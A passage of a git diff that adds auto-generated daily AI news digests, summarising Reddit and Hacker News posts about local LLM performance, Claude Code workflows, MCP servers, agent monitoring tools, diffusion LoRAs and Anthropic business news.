VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM "apocalypse" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple "Hi" prompt. However, if you've used coding agents before… + +--- + +## [Parax v0.7: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/) +*Reddit r/MachineLearning* | 10/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hi everyone! Parax is a library for "Parametric modeling" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! Cheers, Gary + +--- + +## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… + +--- + +## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… + +--- + +## [I built a site to create free AI videos using LTX 2.3 running on my own GPUs](https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b… + +--- + +## [Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.](https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: agent_tool + +> With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously. + +--- + +## [My workflow: GPT for architecture and Claude Code for execution](https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: agent_tool + +> I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe… + +--- + +## [Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?](https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: cli_tool + +> I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\_demo\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D + +--- + +## [Weekend project: behaviour trees for LLM agents](https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: cli_tool + +> Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin… + +--- + +## [I made Claude Code aware of its own usage limits](https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update + +> Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\`anthropic-ratelimit-unified-5h-utilization\`, \`anthropic-ratelimit-unified-7d-utilization\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \`api.anthropic.com\`. Claude Code already respects \`ANTHROPIC\_BASE\_URL\`, so setting that to \`http://127.0.0.1:4080\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \`\~/.claude/usage-status.md\`: \`\`\` 5h=9% 7d=99%! overage=0% bottleneck=seven\_day (10/05/2026, 16:19:04) \`\`\` Claude can then read that file on demand, or you can inject it automatically via a \`UserPromptSubmit\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil… + +--- + diff --git a/data/digest-2026-05-11.md b/data/digest-2026-05-11.md new file mode 100644 index 0000000..0064e08 --- /dev/null +++ b/data/digest-2026-05-11.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-11** | 15 stories | Auto-generated from 572 archived stories + +--- + +## [Orc (working name) - auditable and declarative AI workflow](https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> **I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \- agents \- models/providers \- tools \- schemas \- inputs \- ordered execution steps \- validation rules \- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod… + +--- + +## [My pre-coding routine with Claude Code, 5 MCP servers before I write a single line](https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. Load Context7 for library doc… + +--- + +## [Dunetrace: Real-time monitoring of your production agents](https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update + +> I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. **GitHub repo:** [https://github.com/dun… + +--- + +## [I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls](https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is "just use JSON mode" or… + +--- + +## [What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation](https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per… + +--- + +## [The Claude Platform on AWS is now generally available.](https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws) + +--- + +## [Claude Code Orchestrator -> Sub-agent local LLM](https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious? + +--- + +## [Anyone else think the 1T Valuation is dangerous for Anthropic?](https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and "Mythos" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s… + +--- + +## [Markdown browser for LLMs](https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown. + +--- + +## [I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%](https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right "tools" or because their context window turned to mush after an hour. I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**… + +--- + +## [Natural Woman V2 - Z Image Turbo Lora](https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon. + +--- + +## [I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…](https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: open_source + +> I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why. + +--- + +## [Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates](https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: cli_tool + +> Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I… + +--- + +## [prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads](https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: open_source + +> most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \- 16k prompt / 64 out → 7.5x \- 16k / 128 → 7.3x \- 16k / 1k → 5.4x \- 8k / 4k → 1.7x + +--- + +## [GitLab announces workforce reduction and end of their CREDIT values](https://about.gitlab.com/blog/gitlab-act-2/) +*Hacker News* | 11/05/2026 | Score: 1.00 +Tags: product_launch + +--- + diff --git a/data/digest-2026-05-12.md b/data/digest-2026-05-12.md new file mode 100644 index 0000000..92ddd5e --- /dev/null +++ b/data/digest-2026-05-12.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-12** | 15 stories | Auto-generated from 612 archived stories + +--- + +## [TUI to actually see what Claude Code is doing: cost, loops, tool commands…](https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: mcp, open_source, cli_tool + +> I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. A scan of my own machine for the last 90 days showed what i do been missing: \- $14K spend across 39 sessions \- 129 agent loops, \~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \- 5 sensitive paths an AI could reach at any moment (\~/.ssh, \~/.npmrc, gcloud creds) \- 2 dangerous commands node9 would have blocked Now i can: \- See where my money is going in real time \- Catch the most dangerous commands before they finish running \- Stop or continue a run while it's happening \- Analyze the data after the fact, any time range The live dashboard: \- High level: cost, tokens, command counts, all live \- Notifications: loops + critical commands surface here so i can make a call before things go sideways \- Live feed: the commands Claude is running right now \- Live security: dangerous actions the AI is taking \- Liv… + +--- + +## [I built a Mac app that turns Claude Code agents into live radio stations | Free & open source](https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: open_source, cli_tool, agent_tool + +> **TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer "what is this agent doing right now?" * The agents could run in parallel,… + +--- + +## [Steam Recommender using similarity! (Undergraduate Student Project) [P]](https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/) +*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> (DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad "action". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just "action" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game… + +--- + +## [Elgato Stream Deck Usage Plugin](https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!) + +--- + +## [Can we acknowledge that Anthropic watches open sourcers and copies them?](https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n… + +--- + +## [Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]](https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/) +*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One 